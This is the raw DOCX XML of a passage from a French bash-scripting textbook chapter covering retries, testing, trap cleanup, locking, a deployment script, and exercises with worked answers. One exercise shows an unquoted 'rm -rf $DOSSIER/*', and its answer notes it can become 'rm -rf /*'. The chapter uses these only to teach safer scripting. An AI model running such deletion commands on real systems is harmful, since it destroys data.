        <w:t xml:space="preserve">  local n=0</w:t>
        <w:br/>
        <w:t xml:space="preserve">  until "$@"; do</w:t>
        <w:br/>
        <w:t xml:space="preserve">    n=$((n + 1))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    [[ $n -ge $essais ]] &amp;&amp; return 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">    sleep $((2 ** n))</w:t>
        <w:br/>
        <w:t xml:space="preserve">  done</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>requiert curl</w:t>
        <w:br/>
        <w:t>retry 4 curl -sf https://exemple.fr/sante</w:t>
      </w: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`LOCAL`, `SHIFT` ET `PRINTF`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>local</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> limite la portée d'une variable à la fonction ; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>shift</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> consomme les arguments un à un ; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>printf</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> gère les caractères spéciaux mieux qu'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>echo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, dont le comportement varie selon le shell.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>49.5 Tester un script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un script qui touche à la production se teste comme du code : sur une copie, avec des cas limites, et sans effet de bord.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre niveaux de test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Vérification de syntaxe sans exécution</w:t>
        <w:br/>
        <w:t>bash -n script.sh</w:t>
        <w:br/>
        <w:br/>
        <w:t># Trace d'exécution</w:t>
        <w:br/>
        <w:t>bash -x script.sh 2&gt;&amp;1 | head -50</w:t>
        <w:br/>
        <w:br/>
        <w:t># Analyse statique</w:t>
        <w:br/>
        <w:t>shellcheck script.sh</w:t>
        <w:br/>
        <w:br/>
        <w:t># Test avec un répertoire jetable</w:t>
        <w:br/>
        <w:t>tmp=$(mktemp -d)</w:t>
        <w:br/>
        <w:t>trap 'rm -rf "$tmp"' EXIT</w:t>
        <w:br/>
        <w:t>cp -r donnees "$tmp/"</w:t>
        <w:br/>
        <w:t>./script.sh "$tmp/donnees"</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`TRAP`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Instruction qui associe une action à un signal ou à la sortie du script. Indispensable pour supprimer les fichiers temporaires même en cas d'interruption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Nettoyage garanti et exécution unique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cleanup() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  rm -rf "$tmp"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  log "INFO" "Nettoyage terminé"</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>trap cleanup EXIT INT TERM</w:t>
        <w:br/>
        <w:br/>
        <w:t># Un verrou simple pour éviter deux exécutions simultanées</w:t>
        <w:br/>
        <w:t>exec 9&gt;/var/lock/sauvegarde.lock</w:t>
        <w:br/>
        <w:t>flock -n 9 || { echo "Sauvegarde déjà en cours" &gt;&amp;2; exit 1; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.170 — Quand choisir le shell</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82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Situation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="259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Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="259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Langage généraliste</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3820"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Enchaîner des commandes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2597"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Idéal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2597"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Surdimensionné</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3820"/>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Manipuler des fichiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="259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Idéal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="259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Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3820"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Structures de données complexes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2597"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Limité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2597"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Idéal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3820"/>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Calcul numérique intensif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="259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Inadapté</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="259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Idéal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3820"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Appels HTTP et JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2597"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Maladroit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2597"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Idéal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3820"/>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Déploiement local</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="259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Idéal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="259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Excessif</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Au-delà de cent lignes complexes, un script Python ou Go sera plus lisible, mieux testé et plus portable. Le shell excelle comme colle entre des outils, pas comme langage applicatif.</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CHARTE D'UN SCRIPT D'ÉQUIPE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En-tête avec usage et description.</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set -euo pipefail</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> en deuxième ligne.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Toute variable citée entre guillemets.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Aide intégrée et codes de retour documentés.</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shellcheck</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> dans l'intégration continue.</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set -euo pipefail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> prévient les échecs silencieux.</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variables se citent toujours entre guillemets.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Une valeur par défaut s'écrit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>${VAR:-défaut}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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 ]]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> remplace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[ ]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour les conditions.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Lire un fichier avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>while IFS= read -r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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trap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> garantit le nettoyage même en cas d'interruption.</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shellcheck</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> détecte les erreurs classiques.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shell colle des outils ; il ne remplace pas un langage applicatif.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les scripts automatisent une machine. Reste à versionner ce qu'ils produisent : le chapitre suivant approfondit Git.</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49.1 — Écrire un script de déploiement</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Le script doit construire, publier et vérifier.</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Vérifiez les prérequis.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Arrêtez-vous à la première erreur.</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Prévoyez un retour arrière.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 49.2 — Corriger un script dangereux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   SÉCURITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Ce script de nettoyage s'exécute sur le serveur.</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rm -rf $DOSSIER/*</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Aucun guillemet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Aucune vérification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Exercice 49.3 — Tester avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>shellcheck</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   QUALITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Passez vos scripts à l'analyseur et corrigez trois avertissements.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 xml:space="preserve">Installez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>shellcheck</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Traitez les avertissements bloquants.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Ajoutez-le à l'intégration continue.</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49.1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#!/usr/bin/env bash</w:t>
        <w:br/>
        <w:t>set -euo pipefail</w:t>
        <w:br/>
        <w:br/>
        <w:t>requiert() { command -v "$1" &gt;/dev/null || { echo "Manque : $1" &gt;&amp;2; exit 1;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }; }</w:t>
        <w:br/>
        <w:t>requiert rsync</w:t>
        <w:br/>
        <w:t>requiert npm</w:t>
        <w:br/>
        <w:br/>
        <w:t>VERSION="${1:?version requise, ex. v1.4.2}"</w:t>
        <w:br/>
        <w:t>CIBLE="/var/www/site"</w:t>
        <w:br/>
        <w:br/>
        <w:t>npm ci</w:t>
        <w:br/>
        <w:t>npm run build</w:t>
        <w:br/>
        <w:br/>
        <w:t>rsync -az --delete dist/ "deploy@serveur:$CIBLE.releases/$VERSION/"</w:t>
        <w:br/>
        <w:t>ssh deploy@serveur "ln -sfn $CIBLE.releases/$VERSION $CIBLE.current"</w:t>
        <w:br/>
        <w:br/>
        <w:t>if ! curl -sf https://exemple.fr/health; then</w:t>
        <w:br/>
        <w:t xml:space="preserve">  echo "Échec de santé : retour arrière" &gt;&amp;2</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ssh deploy@serveur "ln -sfn $CIBLE.releases/previous $CIBLE.current"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  exit 1</w:t>
        <w:br/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La publication dans un répertoire versionné suivie d'un lien symbolique rend le retour arrière instantané.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La vérification de santé est la dernière étape : elle valide le déploiement réel, pas seulement la construction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 49.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une variable vide transforme la commande en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rm -rf /*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les espaces dans les noms cassent le découpage.</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#!/usr/bin/env bash</w:t>
        <w:br/>
        <w:t>set -euo pipefail</w:t>
        <w:br/>
        <w:br/>
        <w:t>: "${DOSSIER:?variable DOSSIER requise}"</w:t>
        <w:br/>
        <w:br/>
        <w:t>if [[ ! -d "$DOSSIER" ]]; then</w:t>
        <w:br/>
        <w:t xml:space="preserve">  echo "Répertoire introuvable : $DOSSIER" &gt;&amp;2</w:t>
        <w:br/>
        <w:t xml:space="preserve">  exit 1</w:t>
        <w:br/>
        <w:t>fi</w:t>
        <w:br/>
        <w:br/>
        <w:t>case "$DOSSIER" in</w:t>
        <w:br/>
        <w:t xml:space="preserve">  /|/var|/home|/usr) echo "Cible interdite : $DOSSIER" &gt;&amp;2; exit 1 ;;</w:t>
        <w:br/>
        <w:t>esac</w:t>
        <w:br/>
        <w:br/>
        <w:t>find "$DOSSIER" -mindepth 1 -maxdepth 1 -print -delete</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 49.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># Installation</w:t>
        <w:br/>
        <w:t>apt install shellcheck</w:t>
        <w:br/>
        <w:br/>
        <w:t># Analyse</w:t>
        <w:br/>
        <w:t>shellcheck scripts/*.sh</w:t>
        <w:br/>
        <w:br/>
        <w:t># Intégration continue (GitHub Actions)</w:t>
        <w:br/>
